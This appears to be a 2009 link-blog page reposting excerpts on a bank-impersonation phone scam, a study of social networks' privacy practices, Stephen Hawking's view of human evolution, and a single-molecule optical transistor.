Criminals are resurrecting low-tech attacks to siphon tens of thousands of dollars from unsuspecting victims. According to financial fraud experts, so-called “man-in-the-phone” attacks require little more than a telephone and old-fashioned con artistry. The scam works like this: The criminal calls a target, claiming to be the fraud department of the target’s bank calling to alert the mark to potential unauthorized activity. The recipient of the call is then told to please hold while a fraud specialist is brought on the line. The perpetrator then calls the victim’s bank, and bridges the call, while placing his portion of the call on mute. When the bank’s fraud department asks various questions in a bid to authenticate the victim, the criminal records the customer’s answers. Depending on the institution, the answers may include the victim’s Social Security number or national ID number, a PIN or password, and/or the amount of last deposit
The Economics of Privacy in Social Networks
July 6th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
We often think of social networking to Facebook, MySpace, and the also-rans, but in reality there are there are tons of social networks out there, dozens which have membership in the millions. Around the world it’s quite a competitive market. Sören Preibusch and I decided to study the whole ecosystem to analyse how free-market competition has shaped the privacy practices which I’ve been complaining about. We carefully examined 45 sites, collecting over 250 data points about each sites’ privacy policies, privacy controls, data collection practices, and more. The results were fascinating, as we presented this week at the WEIS conference in London. Our full paper and complete dataset are now available online as well.
We collected a lot of data, and there was a little bit of something for everybody. There was encouraging news for fans of globalisation, as we found the social networking concept popular across many cultures and languages, with the most popular sites being available in over 40 languages. There was an interesting finding from a business perspective that photo-sharing may be the killer application for social networks, as this features was promoted far more often than sharing videos, blogging, or playing games. Unfortunately the news was mostly negative from a privacy standpoint. We found some predictable but still surprising problems. Too much unnecessary data is collected by most sites, 90% requiring a full-name and DOB. Security practices are dreadful: no sites employed phishing countermeasures, and 80% of sites failed to protect password entry using TLS. Privacy policies were obfuscated and confusing, and almost half failed basic accessibility tests. Privacy controls were confusing and overwhelming, and profiles were almost universally left open by default.
The most interesting story we found though was how sites consistently hid any mention of privacy, until we visited the privacy policies where they provided paid privacy seals and strong reassurances about how important privacy is. We developed a novel economic explanation for this: sites appear to craft two different messages for two different populations. Most users care about privacy about privacy but don’t think about it in day-to-day life. Sites take care to avoid mentioning privacy to them, because even mentioning privacy positively will cause them to be more cautious about sharing data. This phenomenon is known as “privacy salience” and it makes sites tread very carefully around privacy, because users must be comfortable sharing data for the site to be fun. Instead of mentioning privacy, new users are shown a huge sample of other users posting fun pictures, which encourages them to share as well. For privacy fundamentalists who go looking for privacy by reading the privacy policy, though, it is important to drum up privacy re-assurance.
The privacy fundamentalists of the world may be positively influencing privacy on major sites through their pressure. Indeed, the bigger, older, and more popular sites we studied had better privacy practices overall. But the desire to limit privacy salience is also a major problem because it prevents sites from providing clear information about their privacy practices. Most users therefore can’t tell what they’re getting in to, resulting in the predominance of poor-practices in this “privacy jungle.”
Stephen Hawking: “Humans Have Entered a New Stage of Evolution”
July 3rd, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Although It has taken homo sapiens several million years to evolve from the apes, the useful information in our DNA, has probably changed by only a few million bits. So the rate of biological evolution in humans, Stephen Hawking points out in his Life in the Universe lecture, is about a bit a year.
“By contrast,” Hawking says, “there are about 50,000 new books published in the English language each year, containing of the order of a hundred billion bits of information. Of course, the great majority of this information is garbage, and no use to any form of life. But, even so, the rate at which useful information can be added is millions, if not billions, higher than with DNA.”
This means Hawking says that we have entered a new phase of evolution. “At first, evolution proceeded by natural selection, from random mutations. This Darwinian phase, lasted about three and a half billion years, and produced us, beings who developed language, to exchange information.”
But what distinguishes us from our cave man ancestors is the knowledge
that we have accumulated over the last ten thousand years, and
particularly, Hawking points out, over the last three hundred.
“I think it is legitimate to
take a broader view, and include externally transmitted information, as
well as DNA, in the evolution of the human race,” Hawking said.
In the last ten thousand years the human species has been in what Hawking calls, “an external transmission phase,” where the internal record of information, handed down to succeeding generations in DNA, has not changed significantly. “But the external record, in books, and other long lasting forms of storage,” Hawking says, “has grown enormously. Some people would use the term, evolution, only for the internally transmitted genetic material, and would object to it being applied to information handed down externally. But I think that is too narrow a view. We are more than just our genes.”
The time scale for evolution, in the external transmission period, has collapsed to about 50 years, or less.
Meanwhile, Hawking observes, our human brains “with which we process this information have evolved only on the Darwinian time scale, of hundreds of thousands of years. This is beginning to cause problems. In the 18th century, there was said to be a man who had read every book written. But nowadays, if you read one book a day, it would take you about 15,000 years to read through the books in a national Library. By which time, many more books would have been written.”
But we are now entering a new phase, of what Hawking calls “self designed evolution,” in which we will be able to change and improve our DNA. “At first,” he continues “these changes will be confined to the repair of genetic defects, like cystic fibrosis, and muscular dystrophy. These are controlled by single genes, and so are fairly easy to identify, and correct. Other qualities, such as intelligence, are probably controlled by a large number of genes. It will be much more difficult to find them, and work out the relations between them. Nevertheless, I am sure that during the next century, people will discover how to modify both intelligence, and instincts like aggression.”
If the human race manages to redesign itself, to reduce or eliminate the risk of self-destruction, we will probably reach out to the stars and colonize other planets. But this will be done, Hawking believes, with intelligent machines based on mechanical and electronic components, rather than macromolecules, which could eventually replace DNA based life, just as DNA may have replaced an earlier form of life.
Casey Kazan
Related Galaxy posts:
The 10,000 Year Explosion: Has Human Civilization Turbo Charged Evolution?
Homo Sapiens -The “Time Travelers” -A Galaxy Classic
“Hyper-Speed” Evolution Discovered
Bringing Ancient Human Viruses Back to Life: A Jurassic Park or Salvation?
Source: http://www.rationalvedanta.net/node/131
Optical Computer Closer: Optical Transistor Made From Single Molecule
July 2nd, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Researchers have successfully created an optical transistor from a single molecule. This has brought them one step closer to an optical computer.